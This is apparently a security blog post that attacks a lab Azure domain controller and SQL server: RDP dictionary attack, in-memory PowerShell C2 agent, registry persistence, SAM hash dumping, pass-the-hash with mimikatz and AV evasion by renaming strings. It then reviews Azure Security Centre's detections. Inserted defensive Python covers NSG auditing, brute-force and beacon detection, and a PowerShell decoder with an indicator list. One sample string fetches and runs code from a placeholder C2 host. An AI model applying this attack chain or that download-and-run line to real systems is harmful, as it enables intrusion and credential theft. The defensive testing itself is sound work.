Microsoft Azure is a cloud computing service for deploying and managing applications and services through a global network of Microsoft-managed data centres. It provides software as a service, platform as a service and infrastructure as a service, with a large number of services, tools and frameworks, including both Microsoft-specific and third-party software systems.
But really, why should you move to the cloud? Well, the next couple of paragraphs explain.
After my introduction to Azure cloud, implementing Azure infrastructure solutions, I decided to look at one of the core Azure cloud services, Azure Security Centre, which aims to prevent, detect and respond to threats with increased visibility and control over resource groups: essentially virtual machines, NSGs (network security groups) and network anomalies such as external/network attacks, especially Windows attack vectors.
What did I really find? The next step was to test the underlying security operations centre capability and identify how it responds to a determined, sophisticated PowerShell-based in-memory/on-disk attack.
We created a resource group under the name securesystem.co.uk and deployed a Windows Server 2012 R2 machine with Active Directory Domain Services installed, plus a SQL Server 2016 machine joined to the domain.
The new ARM template, when deploying a VM, by default doesn't allow any incoming connection; in other words, port 3389 (Remote Desktop Protocol) is not allowed. We created a new NSG (network security group) and allowed port 3389 for remote management. Of course you should never allow direct access to RDP over the public network, but it is still a very common mistake administrators make.
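The NSG mistake described above is easy to catch before an attacker does. The following is an added example (not the post's own code or NSG): a small audit that walks an NSG's securityRules, in the layout of an exported ARM template, and reports any inbound Allow rule that opens a management port to the whole internet. The two rule sets are constructed for the demonstration, the weak one mirroring the "allow 3389 for remote management" rule from the post and the hardened one restricting RDP to a single placeholder admin address (203.0.113.10) with an explicit deny for everyone else.

```python
"""Audit an Azure NSG's securityRules for management ports reachable from the
internet.

Added example (not the post's own code).  The rule layout follows the
securityRules property of an ARM NSG resource; the two rule sets below are
constructed for this demonstration and are not the post's actual NSG.
"""

# Ports a public-facing NSG should never open to the whole internet.
MANAGEMENT_PORTS = {3389: "RDP", 22: "SSH", 5985: "WinRM", 5986: "WinRM over HTTPS"}

# Source prefixes that mean "anyone on the internet" in NSG rule syntax.
OPEN_SOURCES = {"*", "Internet", "0.0.0.0/0"}


def rule_covers_port(props, port):
    """True if destinationPortRange(s) ('3389', '3000-4000' or '*') include port."""
    specs = props.get("destinationPortRanges") or [props.get("destinationPortRange", "*")]
    for spec in specs:
        if spec == "*":
            return True
        if "-" in spec:
            low, high = (int(x) for x in spec.split("-", 1))
            if low <= port <= high:
                return True
        elif int(spec) == port:
            return True
    return False


def source_is_open(props):
    """True if any sourceAddressPrefix(es) entry admits the whole internet."""
    prefixes = props.get("sourceAddressPrefixes") or [props.get("sourceAddressPrefix", "*")]
    return any(prefix in OPEN_SOURCES for prefix in prefixes)


def find_exposed_management_rules(security_rules):
    """Return (rule name, port, service) for every inbound Allow rule that lets
    the whole internet reach a management port.  Priority ordering is not
    modelled: an open Allow rule is reported even if a Deny rule outranks it,
    which errs on the side of flagging."""
    findings = []
    for rule in security_rules:
        props = rule["properties"]
        if props.get("direction") != "Inbound" or props.get("access") != "Allow":
            continue
        if not source_is_open(props):
            continue
        for port, service in MANAGEMENT_PORTS.items():
            if rule_covers_port(props, port):
                findings.append((rule["name"], port, service))
    return findings


# The mistake the post describes: RDP opened to the internet for "remote management".
WEAK_RULES = [
    {"name": "allow-rdp", "properties": {
        "priority": 100, "direction": "Inbound", "access": "Allow", "protocol": "Tcp",
        "sourceAddressPrefix": "*", "sourcePortRange": "*",
        "destinationAddressPrefix": "*", "destinationPortRange": "3389"}},
]

# Corrected form: RDP only from a known admin address (203.0.113.10 is a
# documentation-range placeholder), everything else on 3389 explicitly denied.
HARDENED_RULES = [
    {"name": "allow-rdp-from-admin", "properties": {
        "priority": 100, "direction": "Inbound", "access": "Allow", "protocol": "Tcp",
        "sourceAddressPrefix": "203.0.113.10/32", "sourcePortRange": "*",
        "destinationAddressPrefix": "*", "destinationPortRange": "3389"}},
    {"name": "deny-rdp-internet", "properties": {
        "priority": 200, "direction": "Inbound", "access": "Deny", "protocol": "Tcp",
        "sourceAddressPrefix": "Internet", "sourcePortRange": "*",
        "destinationAddressPrefix": "*", "destinationPortRange": "3389"}},
]

if __name__ == "__main__":
    print("weak:", find_exposed_management_rules(WEAK_RULES))
    print("hardened:", find_exposed_management_rules(HARDENED_RULES))
```

Feeding it the securityRules array from an exported ARM template of a real resource group gives a quick pre-deployment check; the same finding is what Security Centre's "open NSG" recommendation surfaces after the fact.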
Next we enabled Security Centre and added a policy to monitor our resource group containing the Active Directory domain controller and the domain-joined SQL Server 2016. Now that we have configured the virtual machines and Security Centre monitoring, you have probably figured out our next step: the attack.
In this scenario I used the following attacks and tools:
- RDP (Remote Desktop Protocol) dictionary attack using the most commonly used passwords
- Custom-designed PowerShell/Python command and control framework
- Persistence and lateral movement using a pass-the-hash attack
- Forensic network analysis and anomaly detection
On our Kali attacking host we used Medusa with a dictionary file containing the passwords and attacked 18.104.22.168, which is the SRV01 domain controller listening on port 3389. Of course, for the sake of demonstration we added the correct password to the list; as highlighted, the password “ReallySecure$$” was found. Success.
Figure 1: Medusa conducting a controlled dictionary attack from the Kali Linux attacking machine
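On the defender's side, the dictionary attack above leaves a very recognisable trail in the Windows Security log: a burst of failed RDP logons (event 4625, logon type 10) from one source, followed by a success (4624) once the right password is hit. The following is an added example (not the post's own code) of that detection run over constructed events; the event IDs and logon type are the standard Windows ones, while the timestamps, usernames and the source addresses 198.51.100.7 and 10.0.0.4 are made up for the demonstration.

```python
"""Spot an RDP password-guessing burst in Windows Security log events.

Added example (not the post's own code).  Event IDs are the standard ones
(4625 failed logon, 4624 successful logon; logon type 10 is
RemoteInteractive, i.e. RDP).  The event records below are constructed for
this demonstration; the IPs are from documentation ranges.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_EVENTS = [
    # Six failures in ten seconds from one source, then a success: the shape
    # of a dictionary attack that found the password.
    {"time": "2017-03-01T08:00:01", "event_id": 4625, "logon_type": 10, "ip": "198.51.100.7", "user": "administrator"},
    {"time": "2017-03-01T08:00:03", "event_id": 4625, "logon_type": 10, "ip": "198.51.100.7", "user": "administrator"},
    {"time": "2017-03-01T08:00:05", "event_id": 4625, "logon_type": 10, "ip": "198.51.100.7", "user": "administrator"},
    {"time": "2017-03-01T08:00:07", "event_id": 4625, "logon_type": 10, "ip": "198.51.100.7", "user": "private"},
    {"time": "2017-03-01T08:00:09", "event_id": 4625, "logon_type": 10, "ip": "198.51.100.7", "user": "private"},
    {"time": "2017-03-01T08:00:11", "event_id": 4625, "logon_type": 10, "ip": "198.51.100.7", "user": "private"},
    {"time": "2017-03-01T08:00:13", "event_id": 4624, "logon_type": 10, "ip": "198.51.100.7", "user": "private"},
    # An admin on the internal network mistyping once: not a burst.
    {"time": "2017-03-01T08:05:00", "event_id": 4625, "logon_type": 10, "ip": "10.0.0.4", "user": "private"},
    {"time": "2017-03-01T08:05:20", "event_id": 4624, "logon_type": 10, "ip": "10.0.0.4", "user": "private"},
]


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Return {source ip: finding} for every source with >= threshold failed
    RDP logons inside one window.  A successful logon from the same source
    after the burst starts raises the severity, since the attacker got in."""
    by_ip = defaultdict(list)
    for event in events:
        if event["logon_type"] != 10:          # only RDP logons
            continue
        rec = dict(event, time=datetime.fromisoformat(event["time"]))
        by_ip[rec["ip"]].append(rec)

    findings = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["time"])
        failures = [r for r in recs if r["event_id"] == 4625]
        for i, first in enumerate(failures):
            # Grow the window forward from failure i and count what falls inside.
            j = i
            while j < len(failures) and failures[j]["time"] - first["time"] <= window:
                j += 1
            if j - i < threshold:
                continue
            success = any(r["event_id"] == 4624 and r["time"] >= first["time"] for r in recs)
            findings[ip] = {
                "failures": j - i,
                "users": sorted({r["user"] for r in failures[i:j]}),
                "first_seen": first["time"].isoformat(),
                "success_after_burst": success,
                "severity": "High" if success else "Medium",
            }
            break
    return findings


if __name__ == "__main__":
    for ip, finding in detect_rdp_bruteforce(SAMPLE_EVENTS).items():
        print(ip, finding)
```

The "failures then success" pairing is the part worth alerting on at High severity: a burst alone is noise from the internet once RDP is exposed, but a burst that ends in a 4624 means the credential is now in the attacker's hands, which is exactly the state the post reaches with “ReallySecure$$”.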
Next we logged on to SRV01 using rdesktop from the Kali machine with the credentials found in the initial RDP attack.
Figure 2: RDP session with the target SRV01 domain controller
A custom PowerShell agent was created and base64 encoded to copy over to the target machine, in order to maintain persistence on the target and ensure the agent payload lives in memory only after it self-destructs.
Figure 3: PowerShell agent runs on the target machine, deletes itself from disk and lives in memory
The custom Namlook framework (Python/PowerShell command and control) uses public key infrastructure for command and control; the idea is to encrypt the traffic between the target victim machine and my attacking command and control machine.
Figure 4: We have a connection back from the target Azure SRV01 to our Python/PowerShell command and control. As you can see, the payload spawns PowerShell as PID 3632, and we also have the internal IP address, machine name and logged-on user; the last-seen value is based on a 5-second interval to check whether the server is still sending heartbeats.
As the next step we decided to deploy a persistence stager to our target machine; the idea is to force the target SRV01 server to send a cmd.exe shell back to our command and control every day at 8:00am or simply at startup. So whenever a user logs in, we get a nice shell back from SRV01.
Figure 5: Stager, but with a high detection ratio, as this touches the disk and lives in the HKLM:\Software\Microsoft\Network\debug registry key. We base64 encode the payload.
The agent now lives inside the registry debug value; whenever the user logs in to the SRV01 server, the persistence module triggers and sends an encrypted shell back to the command and control.
Figure 6: debug value embedded with the base64 encoded PowerShell agent.
Next we decided to conduct situational awareness to check which other hosts are reachable from the compromised target; this module simply uses nmap (network mapper) to identify hosts and their open ports.
Figure 7: SQLSRV01 (10.0.0.4) identified with open ports 445 (SMB) and 3389
Next we used another module to extract password hashes directly from the SYSTEM/SAM files. The SYSTEM hive is required as it contains the Windows boot key needed to decrypt the password hashes in the SAM file.
Figure 8: User Private with RID 500, which indicates the built-in local administrator account, and user Guest with RID 501, the guest account, which is disabled by default.
Another fantastic tool we used is mimikatz by Benjamin Delpy a.k.a. gentilkiwi, written in C but ported to PowerShell, to make use of the extracted password hashes as a way of gaining access to the connected SQLSRV2 host with the PtH (pass the hash) attack, which essentially injects the NTLMv2 hash into process PID 1240 and calls cmd.exe on the target server.
Figure 9: Now it is just a matter of running another PS module to steal a token and give us full administrative access on the target SQLSRV02 box.
One last demo was to check how Security Centre identifies malicious executables landing on the disk with up-to-date AV. Of course, it's simple to bypass AV: as you can see, I recompiled mimikatz simply by replacing all mimikatz strings in the code with Kikitaz to bypass the anti-virus.
Figure 10: Extracted password hashes from SRV01 (Server 2012) using the renamed KIKTAZZZ build
Azure Security Centre and on-disk analysis
Process Explorer is one of the top Windows Sysinternals tools we use for security/troubleshooting investigations. It lists all processes, and one can easily identify malicious processes, scheduled tasks, TCP/IP connections and, most importantly, file signatures, among much more.
Process Explorer identified PID 3632, PowerShell v1.0, with a command line containing the agent PowerShell code running under the user Private's context: base64 encoded code to send the shell back to the command and control.
Figure 10: Process Explorer identifies the malicious PowerShell code
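The base64 command line Process Explorer shows for PID 3632 is the same artefact that sits in the debug registry value from Figures 5 and 6, and it is where an analyst starts: decode it, then look at what the script actually does. The following is an added example (not the post's code, agent or framework) of that triage step. It decodes a PowerShell -EncodedCommand argument (UTF-16LE, base64), collects a handful of behavioural indicators and pulls out any IPv4 address as a candidate C2, which is what the Security Centre alert in Figure 15 reports. The sample agent script is constructed for the demonstration, the indicator list is my own choice rather than anything the post enumerates, and 203.0.113.5 is a documentation-range placeholder.

```python
"""Decode and triage a PowerShell -EncodedCommand command line, the artefact
Process Explorer shows for PID 3632 in the post.

Added example (not the post's own code or agent).  The sample agent script
below is constructed for this demonstration; the C2 address 203.0.113.5 is a
documentation-range placeholder.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...),
# and a forward slash works as well as a dash.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)[-/]e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

# Behaviours worth a second look in a decoded script.  None is proof on its
# own; the score is the number of distinct indicators that fire.
INDICATORS = [
    (r"(?i)\bIEX\b|Invoke-Expression", "Invoke-Expression / IEX"),
    (r"(?i)Net\.WebClient|DownloadString|Invoke-WebRequest", "downloads content from the network"),
    (r"(?i)-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)-nop\b|-noprofile", "profile bypass"),
    (r"(?i)FromBase64String", "nested base64 layer"),
    (r"(?i)Start-Sleep", "sleep loop (beacon / heartbeat)"),
    (r"(?i)HKLM:\\|HKCU:\\|Get-ItemProperty", "reads a registry value (possible staged payload)"),
]
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def encode_for_powershell(script):
    """Produce the UTF-16LE base64 form PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    blob = match.group(1)
    blob += "=" * (-len(blob) % 4)        # tolerate stripped padding
    return base64.b64decode(blob).decode("utf-16-le", errors="replace")


def analyze_command_line(cmdline):
    """Triage one process command line: decode it, collect indicators and any
    IPv4 addresses (candidate C2) from the outer and decoded text."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + "\n" + (decoded or "")
    indicators = [label for pattern, label in INDICATORS if re.search(pattern, text)]
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "indicators": indicators,
        "c2_addresses": sorted(set(IPV4.findall(text))),
        "score": len(indicators),
    }


# Constructed stand-in for an in-memory agent: fetch the stage, then heartbeat.
# Send-Heartbeat is a hypothetical function name, not a real cmdlet.
SAMPLE_AGENT = (
    "$c = New-Object Net.WebClient; "
    "IEX $c.DownloadString('http://203.0.113.5/stage'); "
    "while($true){ Send-Heartbeat; Start-Sleep -Seconds 5 }"
)
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + encode_for_powershell(SAMPLE_AGENT)

if __name__ == "__main__":
    result = analyze_command_line(SAMPLE_CMDLINE)
    print(result["decoded"])
    print(result["indicators"], result["c2_addresses"], result["score"])
```

Run against process creation telemetry (Security event 4688 with command-line auditing on, or Sysmon event 1) this turns "some PowerShell with a long base64 argument" into a decoded script plus a C2 address, which is the difference between a Medium and a High alert.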
On closer dynamic analysis we can see the winhttp.dll dynamic link library establishing connections to our command and control at 5-minute intervals.
Figure 11: winhttp.dll used for establishing the C2 connection
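Both the 5-second heartbeat behind Figure 4 and the 5-minute winhttp.dll check-ins above share one property that network monitoring can key on: the gaps between connections to the same destination are almost constant, which human-driven traffic never is. The following is an added example (not the post's code) of beacon detection over flow records of the kind NSG flow logs produce. It groups connections by source, destination and port and flags any group whose inter-connection gaps have a low coefficient of variation. The flows are constructed for the demonstration; 203.0.113.5 plays the C2 and 198.51.100.20 an ordinary web server, both documentation-range placeholders.

```python
"""Flag beaconing: outbound connections to one destination at a near-constant
interval, the pattern behind the post's 5-second heartbeat and 5-minute
winhttp.dll check-ins.

Added example (not the post's own code).  The flow records are constructed
for this demonstration; 203.0.113.5 (C2) and 198.51.100.20 (an ordinary web
server) are documentation-range placeholders.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

BASE = datetime(2017, 3, 1, 9, 0, 0)


def build_sample_flows():
    """Return (timestamp, src, dst, dst_port) tuples, NSG flow-log style."""
    flows = []
    # C2 check-in every 300 s with a few seconds of jitter, 12 connections.
    jitter = [0, 2, -1, 3, 0, -2, 1, 2, -3, 0, 1, -1]
    for i, j in enumerate(jitter):
        flows.append((BASE + timedelta(seconds=300 * i + j), "10.0.0.5", "203.0.113.5", 443))
    # A person browsing: bursts of requests with irregular gaps.
    for offset in [0, 40, 45, 300, 310, 900, 905, 1800, 1830]:
        flows.append((BASE + timedelta(seconds=offset), "10.0.0.5", "198.51.100.20", 443))
    return flows


def find_beacons(flows, min_connections=6, max_jitter=0.1):
    """Group flows by (src, dst, port); report groups whose inter-connection
    gaps have a coefficient of variation (stdev / mean) at or below max_jitter.
    Humans produce bursty traffic; timers produce flat gap distributions."""
    by_pair = defaultdict(list)
    for when, src, dst, port in flows:
        by_pair[(src, dst, port)].append(when)

    beacons = []
    for (src, dst, port), times in by_pair.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_jitter:
            beacons.append({"src": src, "dst": dst, "port": port,
                            "connections": len(times),
                            "interval_seconds": round(avg),
                            "jitter": round(cv, 3)})
    return beacons


SAMPLE_FLOWS = build_sample_flows()

if __name__ == "__main__":
    for beacon in find_beacons(SAMPLE_FLOWS):
        print(beacon)
```

The thresholds are the tuning knobs: a longer observation window lets min_connections rise, which cuts false positives from software update checks and monitoring agents (which also beacon, and should be allow-listed by destination), while max_jitter decides how much timing noise still counts as a timer.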
The Azure Security Centre main dashboard shows resource security health with recommendations on vulnerabilities such as open NSGs (network security groups), patching and container encryption.
Figure 12: Azure Security Centre
Azure Security Centre security alerts, with a description of each suspicious activity and its severity level.
Figure 13: Dates and individual attack types with severity levels from Medium to High
Closer analysis shows our dictionary attack from my attacking machine 22.214.171.124 against SRV01 (Server 2012) has been identified as a network anomaly, a good indication of a brute force attack.
Figure 14: RDP network anomaly (brute force) detection
The PowerShell agent was identified as malicious, with the decoded script showing the command and control IP address.
Figure 15: Agent identified as malicious PowerShell
In conclusion, it's clear how Microsoft has raised the security bar against sophisticated attacks, especially in identifying network anomalies and memory-based attacks, as we demonstrated using PowerShell as command and control. These types of attacks are difficult, almost impossible, to identify on premises, but with Azure the response time is around 2 to 3 hours.
The future is here, so it's time to accept and adopt cloud services 🙂
Hit me up for security-related projects or 5 minutes of CLI 🙂